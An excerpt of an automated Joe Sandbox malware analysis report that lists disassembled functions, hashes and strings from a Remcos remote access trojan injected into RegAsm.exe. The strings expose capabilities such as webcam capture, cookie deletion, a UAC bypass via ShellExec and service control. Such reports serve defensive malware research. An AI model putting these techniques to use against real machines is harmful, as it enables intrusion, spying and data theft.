              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
              • String ID:
              • API String ID: 1324828854-0
              • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
              • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
              • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
              • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
              Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free
              • String ID: D[E$D[E
              • API String ID: 269201875-3695742444
              • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
              • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
              • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
              • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
              Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExW.ADVAPI32 ref: 00413D46
                • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              • RegCloseKey.ADVAPI32(00000000), ref: 00413EB4
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseEnumInfoOpenQuerysend
              • String ID: xUG$NG$NG$TG
              • API String ID: 3114080316-2811732169
              • Opcode ID: 08b76a7912a30081b3e44aa767579625ce380fd121976155e2fb2c8398a0c7a5
              • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
              • Opcode Fuzzy Hash: 08b76a7912a30081b3e44aa767579625ce380fd121976155e2fb2c8398a0c7a5
              • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
              Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
                • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
              • _wcslen.LIBCMT ref: 0041B763
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
              • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
              • API String ID: 37874593-122982132
              • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
              • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
              • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
              • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
              Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
              • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
              • API String ID: 1133728706-4073444585
              • Opcode ID: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
              • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
              • Opcode Fuzzy Hash: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
              • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
              Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
              • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
              • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
              • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
              Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
              • _free.LIBCMT ref: 00450F48
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 00450F53
              • _free.LIBCMT ref: 00450F5E
              • _free.LIBCMT ref: 00450FB2
              • _free.LIBCMT ref: 00450FBD
              • _free.LIBCMT ref: 00450FC8
              • _free.LIBCMT ref: 00450FD3
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
              • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
              • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
              • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
              Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
              Download Yara Rule
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
              • int.LIBCPMT ref: 00411183
                • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
              • std::_Facet_Register.LIBCPMT ref: 004111C3
              • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
              • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
              • String ID: (mG
              • API String ID: 2536120697-4059303827
              • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
              • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
              • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
              • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
              Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
              • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
              • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
              • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
              • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
              Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
              Download Yara Rule
              APIs
              • CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0
                • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
              • CoUninitialize.OLE32 ref: 00407629
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: InitializeObjectUninitialize_wcslen
              • String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
              • API String ID: 3851391207-2216821008
              • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
              • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
              • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
              • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
              Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
              Download Yara Rule
              APIs
              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
              • GetLastError.KERNEL32 ref: 0040BAE7
              Strings
              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
              • [Chrome Cookies not found], xrefs: 0040BB01
              • UserProfile, xrefs: 0040BAAD
              • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: DeleteErrorFileLast
              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
              • API String ID: 2018770650-304995407
              • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
              • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
              • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
              • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
              Function 0041CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
              Download Yara Rule
              APIs
              • AllocConsole.KERNEL32 ref: 0041CDA4
              • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Console$AllocOutputShowWindow
              • String ID: Remcos v$4.9.4 Pro$CONOUT$
              • API String ID: 2425139147-3065609815
              • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
              • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
              • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
              • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
              Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
              Download Yara Rule
              APIs
              • __allrem.LIBCMT ref: 0043AC69
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
              • __allrem.LIBCMT ref: 0043AC9C
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
              • __allrem.LIBCMT ref: 0043ACD1
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
              • String ID:
              • API String ID: 1992179935-0
              • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
              • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
              • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
              • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
              Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
              Download Yara Rule
              APIs
              • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: H_prologSleep
              • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
              • API String ID: 3469354165-3054508432
              • Opcode ID: cda6b0fbff319c628721655c4fa246e2f3a2f768a0df06d81a35272adc1baa10
              • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
              • Opcode Fuzzy Hash: cda6b0fbff319c628721655c4fa246e2f3a2f768a0df06d81a35272adc1baa10
              • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
              Function 00411CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
              • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
              • GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
              • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
              • String ID:
              • API String ID: 3950776272-0
              • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
              • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
              • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
              • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
              Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: __cftoe
              • String ID:
              • API String ID: 4189289331-0
              • Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
              • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
              • Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
              • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
              Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
              Download Yara Rule
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Service$CloseHandle$Open$ChangeConfigManager
              • String ID:
              • API String ID: 493672254-0
              • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
              • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
              • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
              • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
              Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
              • _free.LIBCMT ref: 0044824C
              • _free.LIBCMT ref: 00448274
              • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
              • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
              • _abort.LIBCMT ref: 00448293
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$_free$_abort
              • String ID:
              • API String ID: 3160817290-0
              • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
              • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
              • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
              • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
              Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
              Download Yara Rule
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Service$CloseHandle$Open$ControlManager
              • String ID:
              • API String ID: 221034970-0
              • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
              • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
              • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
              • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
              Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
              Download Yara Rule
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Service$CloseHandle$Open$ControlManager
              • String ID:
              • API String ID: 221034970-0
              • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
              • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
              • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
              • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
              Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
              Download Yara Rule
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Service$CloseHandle$Open$ControlManager
              • String ID:
              • API String ID: 221034970-0
              • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
              • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
              • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
              • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
              Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ClassCreateErrorLastRegisterWindow
              • String ID: 0$MsgWindowClass
              • API String ID: 2877667751-2410386613
              • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
              • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
